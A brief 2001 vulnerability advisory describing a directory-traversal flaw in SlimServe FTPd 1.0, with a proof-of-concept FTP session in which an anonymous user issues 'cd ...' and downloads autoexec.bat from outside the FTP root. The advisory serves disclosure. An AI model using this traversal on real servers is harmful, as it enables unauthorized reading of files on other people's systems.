Reported March 1, 2001, by Ken Pfeil.
- SlimServe FTPd 1.0
A vulnerability exists that lets an attacker break out of FTP root by using relative paths. For example, by connecting to a vulnerable host and issuing the command "cd …" an attacker can access the root directory where the FTP server is running.
Joe Testa also provided the following proof-of concept scenario:
C:\> ftp hostname
Connected to vulnerablehost.somewhere.com.
220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
220 127.0.0.1 connected to vulnerablehost.somewhere.com.
User (vulnerablehost.somewhere.com:(none)): anonymous
230 User anonymous logged in, proceed.
ftp> cd ...
250 CWD command successful.
ftp> get autoexec.bat
200 PORT command successful.
150 Opening data connection for "/.../autoexec.bat".
250 RETR command successful.
ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
The vendor, WhitSoft Development, has been notified. However, no workaround or fix is currently available.
Discovered by Joe Testa.